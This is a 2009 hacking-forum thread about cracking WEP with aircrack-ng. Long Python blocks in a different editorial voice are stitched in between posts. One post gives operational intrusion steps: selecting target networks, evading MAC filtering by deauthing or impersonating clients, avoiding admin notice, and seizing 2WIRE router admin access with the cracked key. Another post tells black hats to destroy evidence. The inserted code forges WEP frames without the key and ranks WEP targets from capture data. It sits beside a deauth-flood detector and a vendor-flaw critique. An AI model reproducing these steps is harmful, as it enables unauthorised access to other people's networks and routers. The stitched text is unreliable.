
How to crack WEP like the feds, in 3 mins.


26 replies to this topic

#1 Bi0X

Bi0X

    H4x0r

  • Members
  • 36 posts
  • Location:England, London

Posted 02 June 2009 - 01:46 PM

Hi.

I was recently reading an article here: http://www.hellbound...-fbi-style.html
explaining how to get the WEP key for a network in 3-4 mins.

I am very interested in this, and wish to try it out on my own network. Sadly I am having some trouble using the 2 main programs mentioned in this article "Kismet" and "Aircrack".

I am using Ubuntu at the moment, and am having some slight trouble downloading these two. (Sorry, I only started with Linux a week or two ago :( )

I can probably get by without Kismet, as I know the SSID and Channel of my current network, but for me to try this out, I really need Aircrack.

Could someone please help me in downloading these programs and give any ideas which might help as I am slightly confused on some things mentioned in this article.

Thanks very much.

#2 johnnymanson

johnnymanson

    SUP3R 31337

  • Members
  • 175 posts
  • Gender:Male
  • Location:Somewhere in NC, USA

Posted 02 June 2009 - 02:21 PM

Hak5 did an episode using aircrack. It is here. http://www.hak5.org/...de-3x06-release

Maybe I watch this show too much, but I do like it!

If I remember correctly they use backtrack. It has many security tools built into a dedicated Linux distribution. This may be easier than setting it all up in Ubuntu. It can also be run from a bootable CD or USB drive. You can learn more about Backtrack at http://www.remote-ex.../backtrack.html.

Good luck. I'm not sure you'll get it in 3 minutes unless the password is weak; I bet the Feds don't either.

#3 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Gender:Male

Posted 02 June 2009 - 03:54 PM

As he said, you can't crack WEP in only 3 minutes! :) But it is easy to do with any Linux distro that has both the aircrack-ng suite and Kismet installed... if you search on Google you can find a lot of tutorials that explain this attack! ;)

#4 dinscurge

dinscurge

    "I Hack, therefore, I am"

  • Members
  • 936 posts
  • Gender:Male
  • Location:the bunker

Posted 02 June 2009 - 06:04 PM

use apt or synaptic... e.g.
apt-get install kismet


#5 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Gender:Male

Posted 03 June 2009 - 12:45 PM

I think that Kismet and aircrack-ng aren't in the Ubuntu repository... you can check with these simple commands:
sudo apt-get update                 # update your package lists first

sudo apt-cache search aircrack-ng   # find anything matching "aircrack-ng" in your lists

sudo apt-get install aircrack-ng    # if you find it, install it with this command; use the same procedure for kismet

;)

#6 Spyril

Spyril

    Hakker addict

  • Members
  • 588 posts
  • Location:North Dakota

Posted 03 June 2009 - 01:03 PM

Kismet and Aircrack are indeed in Ubuntu's repos. But you may as well install them from source. There's a completely new and improved version (i.e., an entire rewrite of the codebase) of Kismet that isn't in the repository yet.

#7 SchippStrich

SchippStrich

    SUP3R 31337 P1MP

  • Members
  • 293 posts
  • Gender:Male
  • Location:USA

Posted 03 June 2009 - 03:38 PM

Listen to Spyril

#8 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Gender:Male

Posted 04 June 2009 - 02:30 AM

Obviously, if you follow Spyril's suggestion, you can download Kismet from here and aircrack-ng from here
Enjoy!;)

#9 robo_geek

robo_geek

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 01 August 2009 - 12:36 AM

As he said, you can't crack WEP in only 3 minutes! :) But it is easy to do with any Linux distro that has both the aircrack-ng suite and Kismet installed... if you search on Google you can find a lot of tutorials that explain this attack! ;)


I scoff when everybody says they can crack WEP in two minutes. You can on some hardware, but you can't on some others. And if there are no clients on the WLAN, you can't do a deauth attack, because you can't deauth what's not authenticated. There are a lot of 'it depends' issues.

Doing a traditional passive air-snort style WEP crack can be done quickly only on a VERY busy network, and some vendors (e.g. Cisco) implemented WEP better than others, so you can pass 45 gigs of data thru a Cisco AP running WEP and you'll get around 100 IV collisions. Without enough interesting packets, you can't crack WEP, period. As they say in the South, y'all can't get there from here.

You can only generate enough traffic by forcing deauthentication with aireplay, but if there are no clients on the WLAN at the time, there's nothing to deauth. Now if it's a garden-variety Netgear or Symbol box, and it's got a couple of clients, that's another story, because you get plenty of IV collisions to work with.

The real speed happens when you start forcing traffic with tools like aircrack-ptw which deals with ARP packets only. I'm not a Cisco bigot, but most of their APs are an embedded *NIX box, and these boxes can send SNMP traps alerts to your IDS console. So if somebody is deauth attacking a Cisco AP running WEP or WPA on a managed WLAN, it's gonna be setting off alarms, big time, at the console.
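The alarm robo_geek describes is easy to put into code. The following is an added example, not code from this thread or from any vendor's IDS: a sliding-window counter over 802.11 management-frame records that flags a deauthentication or disassociation flood per claimed source address. The record layout (time, subtype, source, destination, BSSID) and every frame in the sample are constructed for the illustration.

```python
"""Flag deauth/disassoc floods in 802.11 management-frame records, the kind
of check a wireless IDS raises an alarm on. Added example; the record layout
and all frames below are constructed for illustration."""
from collections import defaultdict, deque

# 802.11 management frame subtypes
BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_floods(frames, window=2.0, threshold=8):
    """frames: iterable of (t_seconds, subtype, source_mac, dest_mac, bssid).
    Counts deauth/disassoc frames per *claimed* source over a sliding window
    and returns one alert per source the first time it crosses the threshold.
    The source is only "claimed" because an injector spoofs the AP's address,
    which is why both the AP and the client show up as flood sources."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for t, subtype, src, dst, bssid in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window:          # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"time": t, "source": src, "bssid": bssid,
                           "count": len(q), "broadcast": dst == BROADCAST})
    return alerts


AP, CLIENT = "00:11:22:33:44:55", "aa:bb:cc:00:00:01"
# Constructed traffic: normal beacons, one legitimate deauth (idle timeout),
# then a burst in both directions at t=10s, the way a directed deauth from an
# injection tool spoofs the AP towards the client and the client towards the AP.
SAMPLE_FRAMES = [(i * 0.1, BEACON, AP, BROADCAST, AP) for i in range(200)]
SAMPLE_FRAMES.append((3.0, DEAUTH, AP, CLIENT, AP))
SAMPLE_FRAMES += [(10.0 + i * 0.05, DEAUTH, AP, CLIENT, AP) for i in range(64)]
SAMPLE_FRAMES += [(10.0 + i * 0.05, DEAUTH, CLIENT, AP, AP) for i in range(64)]

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"t={a['time']:.2f}s deauth flood from {a['source']} "
              f"({a['count']} frames in {2.0}s window)")
```

The threshold and window are tuning knobs; a single deauth from the AP (a station timing out) never trips it, while an injector's burst trips it within the first half second, on both spoofed addresses.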

#10 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Gender:Male
  • Location:SD

Posted 01 August 2009 - 02:08 AM

The best time I have cracked 104-bit (that is, 104-bit encryption and a 24-bit IV together make 128-bit, just a recap for some) was 5 min and 8 sec. That is from start to finish on an untested, unknown network.

I was asked to make a step by step (AKA a Script Kiddies wet dream) on cracking WEP and have produced one. Cracking WEP is not all that complicated, and the method used is explained on Aircrack's website.

Here is the Step by Step for any who need it.

This is only to be used to see how it is done.
I take no responsibility with what you do with it....
Etc, Etc.. other release of liability BS... Etc

Cracking it within 3 min: like others have stated, everything needs to be perfect and you need a sh*t load of luck, I guess.

I know there is a way to crack WEP in 20 seconds, but people need the hardware (router) that Verizon FiOS gives out.
I have a mini paper written up that I sent out on how I found this security flaw; I just need to find it. I wrote it and sent it a long time ago.

Well good luck with your WiFi adventures


#11 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,102 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 01 August 2009 - 02:16 AM

You will probably need to patch your drivers too. Also, it is possible to crack WEP in minutes with the chop-chop and fragmentation attacks; no clients needed. With each, the longest part (if you've got two Atheros with properly patched drivers) is entering the long-ass commands. Atheros, from what I've experienced, have the best patches, and when one is injecting and the other capturing, WEP can be cracked in under 15 min. The newest PTW brute-force algorithm will crack 104-bit (128-bit) WEP basically on the fly, with enough IVs (about 50K to 100K).
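Both robo_geek's point about IV collisions and tekio's point that chop-chop and fragmentation need no clients come down to two properties of WEP: the 24-bit IV forces keystream reuse, and the first bytes of every ARP frame are known plaintext, so keystream can be read straight off a captured frame and the CRC-32 ICV can be recomputed without the key. The following is an added Python example, not code from this thread or from the aircrack-ng suite. It implements RC4 and WEP framing on a toy scale; the 104-bit key, the IVs and all frame contents are constructed. It shows the first step of the client-less attacks (8 bytes of keystream from the LLC/SNAP header, then a 4-byte fragment the AP accepts); the real attacks go on to stretch that into a full-length keystream using the AP itself.

```python
"""Why WEP falls: 24-bit IV reuse, and known-plaintext keystream recovery that
lets an attacker forge frames the AP accepts without ever learning the key.
Added illustration, not code from the thread or aircrack-ng; the key, IVs and
frame contents are constructed."""
import math
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP body: IV || RC4_{IV||key}(payload || CRC-32 ICV). The IV is sent in
    the clear and is the only per-packet variation in the RC4 key."""
    plaintext = payload + zlib.crc32(payload).to_bytes(4, "little")
    return iv + xor(plaintext, rc4(iv + key, len(plaintext)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (payload, icv_ok), as a receiving AP or station would see it."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor(body, rc4(iv + key, len(body)))
    payload, icv = plaintext[:-4], plaintext[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv


KEY = bytes.fromhex("0102030405060708090a0b0c0d")  # constructed 104-bit key
# First 8 bytes of every ARP payload on 802.11: LLC/SNAP header + EtherType 0x0806
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def expected_frames_to_iv_repeat() -> float:
    """Birthday bound for random 24-bit IVs: a repeat is expected after about
    sqrt(pi/2 * 2^24) ~ 5,100 frames, not the 16.7M the IV size suggests."""
    return math.sqrt(math.pi / 2 * 2 ** 24)


def demo_iv_reuse() -> bool:
    """Two frames under one IV share a keystream; XORing the ciphertexts cancels
    it, and knowing one plaintext (an ARP request) reveals the other."""
    iv = b"\x12\x34\x56"
    p1 = LLC_SNAP_ARP + b"who has 10.0.0.1? tell host-A"
    p2 = (LLC_SNAP_ARP + b"10.0.0.1 is at host-B").ljust(len(p1), b".")
    f1, f2 = wep_encrypt(KEY, iv, p1), wep_encrypt(KEY, iv, p2)
    p1_with_icv = p1 + zlib.crc32(p1).to_bytes(4, "little")  # attacker knows p1, not KEY
    return xor(xor(f1[3:], f2[3:]), p1_with_icv)[:-4] == p2


def recover_keystream(frame: bytes, known_prefix: bytes) -> bytes:
    """Keystream for this IV = ciphertext XOR known plaintext; the starting
    point of the chop-chop and fragmentation attacks."""
    return xor(frame[3:3 + len(known_prefix)], known_prefix)


def forge_frame(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Valid frame from recovered keystream alone: the ICV is an unkeyed CRC-32."""
    plaintext = payload + zlib.crc32(payload).to_bytes(4, "little")
    if len(plaintext) > len(keystream):
        raise ValueError("need 4 more keystream bytes than payload bytes")
    return iv + xor(plaintext, keystream)


def demo_forge_without_key() -> bool:
    """Sniff one ARP frame, take 8 bytes of keystream from its known header, and
    inject a 4-byte fragment with a valid ICV under the same IV."""
    iv = b"\xde\xad\x01"
    sniffed = wep_encrypt(KEY, iv, LLC_SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01")
    keystream = recover_keystream(sniffed, LLC_SNAP_ARP)     # no KEY used
    forged = forge_frame(iv, keystream, b"\xaa\xaa\x03\x00")  # fragment-sized payload
    payload, icv_ok = wep_decrypt(KEY, forged)                # the AP's view
    return icv_ok and payload == b"\xaa\xaa\x03\x00"


if __name__ == "__main__":
    print(f"IV repeat expected after ~{expected_frames_to_iv_repeat():.0f} frames")
    print("same-IV plaintext recovered:", demo_iv_reuse())
    print("forged frame accepted without key:", demo_forge_without_key())
```

Nothing here needs the key except the two calls that stand in for the access point; every attacker-side step uses only what is on the air, which is why the injection-based attacks work on an otherwise idle WEP network.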

#12 robo_geek

robo_geek

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 03 August 2009 - 01:32 AM

The best time I have cracked 104-bit (that is, 104-bit encryption and a 24-bit IV together make 128-bit, just a recap for some) was 5 min and 8 sec. That is from start to finish on an untested, unknown network.

I was asked to make a step by step (AKA a Script Kiddies wet dream) on cracking WEP and have produced one. Cracking WEP is not all that complicated, and the method used is explained on Aircrack's website.

Here is the Step by Step for any who need it.

This is only to be used to see how it is done.
I take no responsibility with what you do with it....
Etc, Etc.. other release of liability BS... Etc

Cracking it within 3 min: like others have stated, everything needs to be perfect and you need a sh*t load of luck, I guess.

I know there is a way to crack WEP in 20 seconds, but people need the hardware (router) that Verizon FiOS gives out.
I have a mini paper written up that I sent out on how I found this security flaw; I just need to find it. I wrote it and sent it a long time ago.

Well good luck with your WiFi adventures


Cool Mini paper. I will give this a shot when I get a spare minute. I admit that it's been awhile since I've cracked wep, and am itching to see how WPA/WPA2 secured devices hold up. It's interesting the work that Elcomsoft is doing with nVidia GPUs to 'recover lost WPA or WPA2 keys'.

#13 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 03 August 2009 - 05:34 AM

Nice tute, Biosphear.

I have a few notes to add:

  • First of all, in order to crack wifi, your wireless adapter must be capable of these two functions: monitor mode and packet injection. You can think of monitor mode as sort of like "hyper-promiscuous mode for wireless cards." In monitor mode you can listen to all traffic on the air from any AP or other 802.11 device within range. "Packet injection" means crafting custom packets and sending them out on the air through your wireless adapter. If your wireless adapter's chipset does not support monitor mode and packet injection, or if there's no driver or patch available that supports these features, then sorry; you're not going to be cracking wifi networks with that adapter.

    There's a limited number of chipsets with available drivers to support monitor mode and injection, but luckily most of them are extremely popular so finding one is not too difficult. All the Atheros, most Realtek and Ralink, and some Broadcom chipsets are supported. In some cases a special driver is required, and sometimes it might even be necessary to apply a kernel patch :o to enable these features. If your adapter just won't work or will require a lot of trouble to get working, you can always buy an external USB wifi adapter. They're pretty cheap these days.
  • If you do need a replacement adapter, I strongly recommend the Alfa AWUS036H. Retailing at $30-45, it's a freaking bargain considering its performance over similarly-priced adapters by Linksys and Netgear.

    It may be ugly, but this adapter is the wardriver's best friend. It's built on a well-supported Realtek chipset, and its 500mW transceiver provides perhaps the best range of any USB Wifi adapter. The best part is, you can plug in a high-gain replacement antenna which will take full advantage of the Alfa's performance. With a 7dBi antenna and optimum conditions, this thing can pick up networks a quarter-mile away.
  • Regarding step 4 in Biosphear's tutorial: The device ID that Linux gives to your wireless adapter may vary from device to device and from distro to distro. Sometimes you'll see "wlan0," sometimes "ath0" or "eth1." The Alfa AWUS036H (which I pimped in the paragraph above) shows up on my netbook as "wlan0" until I use airmon-ng to put it into monitor mode, whereupon a new device ID is created with the name "mon0". When you run ifconfig, it's really not too difficult to figure out which device is your ethernet and which is your wireless. Just be aware that the device IDs may not be consistent with tutorials you find on the Internets.
  • Before you start any cracking, type "sudo cd /root" and sudo mkdir a new directory called .ac-ng in your /root directory. If you do all your cracking from this directory you can keep all your stuff organized. All aircrack-ng tools must be run as root, so either sudo them or else type "sudo -s" at the start of every cracking operation to get a root prompt. (If you choose the second option, be sure to close the terminal after you're done working as root!)
  • Regarding step 7 in Biosphear's tutorial: When using airodump-ng to choose a target network to crack, look for a network with a high power (PWR) and preferably one with at least a few nodes connected. Of course, you'll want one with "WEP" specified in the encoding (ENC) column. Another good thing to look for is any network with an SSID containing "2WIRE". (More about this later ;) )
  • Once you've selected your target network, mkdir a new subdirectory inside /root/.ac-ng, name it after the target network's SSID, and cd into there before pointing airodump-ng at the target AP. This method will keep all your data organized by network and avoid having a crap-ton of .cap files piling up all over the place.
  • Make a note of the network's BSSID and also the channel it's operating on. It's a good idea to open up a text editor and copy/paste all this info into a text document, along with the MAC addresses of any hosts connected to the target network. Name this text document after the network SSID and save it in the /root/.ac-ng/<target network SSID> directory. Go back to the terminal and hit Ctrl-C to quit airodump-ng. When you restart it, make sure to specify both the BSSID ("-b") and the channel ("-c") of the target AP, and don't forget to add "-w" followed by the filename you want to write the file to (you might want to use the target network's SSID for this as well).
  • Between steps 9 and 10, it's important to recognize whether the target AP is filtering clients by MAC address. If the target is set up for MAC filtering, then you'll need to use a slightly different approach to crack the network. When you run your fakeauth, if you're able to connect OK, then you know MAC filtering is not enabled and you can proceed as described in Biosphear's tutorial. If, however, you start receiving deauth packets then that's a good sign that MAC filtering is enabled on the AP.

    If you're getting filtered out by MAC address, then you'll need to see some connected hosts in order to attack the network. If another host is connected to the network, you can run a deauth attack against that host (specify its MAC address) and then fakeauth using its MAC address in place of your own. It's important to remember that deauth attacks against a connected host will bump that host offline. Because deauth attacks tend to be 'noisy,' you should keep them to a minimum. If people on the target network keep getting repeatedly knocked offline, they'll probably realize there's something wrong with the router and you might gain the attention of a network admin. A stealthier approach in the case of MAC addy filtering is to bide your time: make a log of all the client MAC addresses connected to the target AP, then try again at a time of day when there's little or no traffic. Find a MAC address on your list which is not connected, then carry out your disassociation/ARP replay attacks under the guise of that trusted client.

  • Finally, a (hopefully) useful bit of information: Due to a ridiculously stupid "ease-of-use" feature, many 2WIRE routers have a vulnerability that allows anyone who cracks the WEP key to easily gain full administrative access to the router (2WIRE wifi routers are standard equipment on AT&T, Bellsouth and Qwest home DSL networks, BTW). After cracking the WEP key of a 2WIRE router, you can easily gain admin access by the following method:


    1. Connect to the network using the cracked WEP key you acquired from aircrack-ng.

    2. Open a browser window and type the IP address of the 2WIRE router in the address bar. This should not be too hard to guess. For routers on AT&T service it will most likely be 192.168.1.254, but other companies might use different numbers. As usual, Google is your friend here.

    3. When you get to the router setup login page, click the link for "I forgot my password."

    4. The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

    5. You're in.

Now you can change any admin settings you please. If the router is filtering by MAC address, this would be a prime opportunity to add your own MAC address (spoofed, of course!) to the whitelist.

I don't know if this works on all 2WIRE routers, but it seems to work on quite a lot of them.
As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Edited by Colonel Panic, 03 August 2009 - 05:06 PM.
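Colonel Panic's selection and bookkeeping steps (WEP in the ENC column, strong PWR, connected clients, a note of every client MAC for the MAC-filter case, then airodump-ng locked to the target's BSSID and channel with -w) can be driven from the CSV that airodump-ng writes next to its .cap file. The following is an added Python example, not code from this thread or from aircrack-ng. The rows in SAMPLE_CSV are constructed to match the column layout of an airodump-ng CSV, the monitor interface name mon0 is assumed, and the command builder uses airodump-ng's long-form --bssid option. One detail worth copying: an ESSID is attacker-chosen bytes, so it is sanitised before it becomes a file name prefix.

```python
"""Rank WEP targets and collect their client MACs from airodump-ng CSV output.
Added example, not code from the thread or from aircrack-ng. The CSV layout
follows the file airodump-ng writes with "-w <prefix>"; the rows below are
constructed, not a real capture, and the interface name mon0 is assumed."""
import csv
import io
import re

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-08-03 11:00:01, 2009-08-03 11:05:10,  6,  54, WEP , WEP, OPN, -45,  120,  3010,   0.  0.  0.  0,   8, 2WIRE123,
00:AA:BB:CC:DD:EE, 2009-08-03 11:00:03, 2009-08-03 11:05:10, 11,  54, WPA2, CCMP, PSK, -60,   80,     0,   0.  0.  0.  0,   7, homenet,
66:77:88:99:AA:BB, 2009-08-03 11:00:09, 2009-08-03 11:05:08,  1,  11, WEP , WEP, OPN, -88,   30,    12,   0.  0.  0.  0,   7, linksys,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2009-08-03 11:00:05, 2009-08-03 11:05:09, -50,  200, 00:11:22:33:44:55, 2WIRE123
AA:BB:CC:00:00:02, 2009-08-03 11:01:12, 2009-08-03 11:04:50, -70,   15, 00:11:22:33:44:55,
AA:BB:CC:00:00:03, 2009-08-03 11:02:00, 2009-08-03 11:05:00, -80,    5, (not associated), homenet,linksys
"""


def parse_airodump_csv(text: str):
    """Split the two sections (APs, then stations) into lists of dicts."""
    aps, stations, mode = [], [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [f.strip() for f in row]
        if not row or not row[0]:
            continue                      # blank separator line
        if row[0] == "BSSID":
            mode = "ap"
            continue
        if row[0] == "Station MAC":
            mode = "station"
            continue
        if mode == "ap" and len(row) >= 14:
            aps.append({"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                        "power": int(row[8]), "ivs": int(row[10]), "essid": row[13]})
        elif mode == "station" and len(row) >= 6:
            stations.append({"mac": row[0], "power": int(row[3]), "bssid": row[5],
                             "probed": [p for p in row[6:] if p]})  # may span commas
    return aps, stations


def rank_wep_targets(aps, stations, min_power=-75):
    """WEP networks only, strongest signal first, with the MACs of associated
    clients (needed for ARP replay/deauth, and for the MAC-filter workaround)."""
    clients = {}
    for st in stations:
        clients.setdefault(st["bssid"], []).append(st["mac"])   # skips "(not associated)" for APs
    targets = [{**ap,
                "clients": clients.get(ap["bssid"], []),
                "two_wire": "2WIRE" in ap["essid"].upper(),
                "usable_signal": ap["power"] >= min_power}
               for ap in aps if "WEP" in ap["privacy"].upper()]
    targets.sort(key=lambda t: (t["power"], len(t["clients"])), reverse=True)
    return targets


def shortlist(text: str = SAMPLE_CSV):
    return rank_wep_targets(*parse_airodump_csv(text))


def safe_prefix(essid: str) -> str:
    """ESSIDs are untrusted bytes; never pass one unsanitised as a file name."""
    return re.sub(r"[^A-Za-z0-9_-]", "_", essid) or "target"


def capture_argv(target, iface: str = "mon0"):
    """airodump-ng invocation locked to one BSSID and channel, writing to a
    prefix named after the ESSID (as the post suggests), sanitised."""
    return ["airodump-ng", "--bssid", target["bssid"], "-c", str(target["channel"]),
            "-w", safe_prefix(target["essid"]), iface]


if __name__ == "__main__":
    for t in shortlist():
        flag = " (2WIRE)" if t["two_wire"] else ""
        print(f"{t['essid']}{flag} ch{t['channel']} {t['power']} dBm "
              f"clients={t['clients']} ivs={t['ivs']}")
        print("  ", " ".join(capture_argv(t)))
```

Run it on a real `<prefix>-01.csv` by passing the file contents to shortlist(); the client list per BSSID is exactly the log the post recommends keeping for the MAC-filtering case.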


#14 zandi

zandi

    SUP3R 31337 P1MP

  • Members
  • 263 posts
  • Location:michigan

Posted 03 August 2009 - 11:38 AM

It's been a while since I've done any WEP cracking; I'll have to set up my Fon and mess around with it.

But one thing first. It seems that after I run Kismet I can't get my wireless interface back in working order. I've got to run and take care of some stuff, but IIRC, it just stays in monitor mode and won't come back out. Any idea on how to fix this without having to reboot the machine?

#15 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 03 August 2009 - 02:19 PM

Have you tried:

airmon-ng stop <device ID of your wireless adapter> ?

Edited by Colonel Panic, 03 August 2009 - 02:23 PM.


#16 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Gender:Male
  • Location:SD

Posted 04 August 2009 - 01:55 AM

Nice tute, Biosphear.

Thank You :D

My step by step does assume a few things.

One:
You are root

Two:
You are using a supported WiFi card that can do both monitor mode and packet injection

Three:
The device you are trying to get into does not filter MACs

Four:
You do not have to mkdir, it will save to your root drive, but if you do want to keep it neat you can do that (mine is just if you are doing one crack, so you have only 3 files to deal with)

Five:
You own the router (Your method seems to be more on the black hat side, mine is so people can have a simple step by step to see how WEP cracking can be done)

Six:

The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

I think the number printed on the label on the bottom is the WEP Key.

Seven:

As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Should have put that first

Good add ons to my file though CP. :D

I have a few more step by steps that I may have you look over, to make them easier to understand. They all work; I and others test them. They just do not break it down as much. I have other step by steps that do that, but they do it on a technical level, not a user level.

Thanks for the input.

biosphear

Edited by biosphear, 04 August 2009 - 01:56 AM.


#17 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 04 August 2009 - 06:57 AM

My step by step does assume a few things.

One:
You are root

Two:
You are using a supported WiFi card that can do both monitor mode and packet injection

Three:
The device you are trying to get into does not filter MACs

Four:
You do not have to mkdir, it will save to your root drive, but if you do want to keep it neat you can do that (mine is just if you are doing one crack, so you have only 3 files to deal with)

Five:
You own the router (Your method seems to be more on the black hat side, mine is so people can have a simple step by step to see how WEP cracking can be done)

I tried to keep it neutral-sounding, but I guess the methodology implies that one would be cracking lots of routers and would therefore need to keep all one's cracking sessions organized.

If a "black hat" hacker was cracking lots of routers illegally, it would be unwise to retain all the data pertaining to numerous hacks right there on his hard drive for authorities to find (even if it is inside an obscurely-named hidden directory within /root). For a black-hat, it would be wiser to destroy all the incriminating data right after the crack is done.

Of course if a pen tester was legitimately hired to do security analysis of a company and he was profiling wireless vulnerabilities, he would certainly want to retain all the relevant data in an organized fashion.

Six:


The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

I think the number printed on the label on the bottom is the WEP Key.

It might be the original WEP key, but I have tried this out on my parents' 2WIRE DSL modem/router (my father had deliberately changed the security settings) and the new WEP key unlocked the router.

Seven:


As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Should have put that first

^_^

Good add ons to my file though CP. :D

Thanks

I have a few more step by steps that I may have you look over, to make them easier to understand. They all work; I and others test them. They just do not break it down as much. I have other step by steps that do that, but they do it on a technical level, not a user level.

Thanks for the input.

biosphear

You're welcome.

Maybe we could cobble all this together into an explicit tutorial and upload it to DocDroppers?

Edited by Colonel Panic, 04 August 2009 - 07:06 AM.


#18 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Gender:Male
  • Location:SD

Posted 04 August 2009 - 01:01 PM

Maybe we could cobble all this together into an explicit tutorial and upload it to DocDroppers?


Sounds good.
I have a few others that I have finished, and a 50 or so page one (as it is looking like so far) on owning your first box, step by step, from getting into the network to grabbing what you want off that system.
I'm also working on a more advanced one (I mean about 100 times more) than my Owning Your First Box, on how to get past network security measures.

PM me and lets see what we can get together :)

#19 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 12 August 2009 - 02:14 PM

I think the number printed on the label on the bottom is the WEP Key.

It might be the original WEP key, but I have tried this out on my parents' 2WIRE DSL modem/router (my father had deliberately changed the security settings) and the new WEP key unlocked the router.

Last weekend I did a little more poking around with my parents' DSL modem/router (a 2WIRE from AT&T) and it appears you're right.

How it works is this: The device ships with WEP enabled and a pre-set, good quality cryptographic key in place. That default WEP key is printed on a label adhered to the bottom of the router, along with the device's MAC addy and serial number. That original, default WEP key is used by the router as an alternative to an admin login in the event of a lost password.

Changing the WEP key is indeed possible, as is changing the security settings to use WPA and WPA2, but AT&T does not routinely provide its customers with any hard-copy documentation on how to change the admin settings of the device. Therefore, most users seem to have no idea that it's even possible, judging by the vast majority of 2WIRE routers "in the field" operating on WEP security with a default key. If the WEP key is changed by the owner, then a cracking attempt will reveal to the attacker the new WEP key and not the default, so administrative access to the router will not be as easily obtained.

Regardless, this is a really bad situation for AT&T DSL users, for several reasons:

  • If the default WEP key is not changed by the end-user, an attacker can easily gain administrative access to the router, and thereby the entire LAN. AT&T's installation and setup guide does not explain how to change the router's WEP key, and the DSL modem/router does not come with a user's manual.
  • Shipping routers with WEP enabled by default promotes a false sense of security to end-users, creating the impression that they're protected when in fact their entire network is up for grabs.
  • Even if the user does understand that WEP is inadequate, AT&T does not provide any instructions for how to change the security settings of the device without the user logging into his or her AT&T Broadband Web site and seeking out the 2WIRE router user's manual.
  • Enabling WPA-PSK security instead of WEP would not only provide better security against bandwidth stealing, but would also prevent wifi crackers from obtaining administrative access to the router. However, this information is not provided up-front by AT&T to its customers at the time of installation.
  • Even changing the WEP key to something other than the default (while not providing good security against bandwidth stealing) would at least help prevent attackers from obtaining administrative access to the router, but again this information is not provided up-front by AT&T to its customers at the time of installation.

This is another example of user security being sacrificed for ease-of-use. This is unfortunately common practice these days, as manufacturers and service providers dumb down their products' documentation and user interfaces in the interest of lowering their own tech support costs.

Edited by Colonel Panic, 13 August 2009 - 05:07 AM.


#20 Skunkworks

Skunkworks

    mad 1337

  • Members
  • 130 posts
  • Location:-36.566^2

Posted 29 August 2009 - 11:49 PM

Heh, funny this came up.

I recently did an entire walkthrough of just how insecure WEP is for a 4H computer competition and ended up winning...

And 3-4 minutes is nothing, in my demo I got past my test network's 64-bit WEP in a little over 1:30!



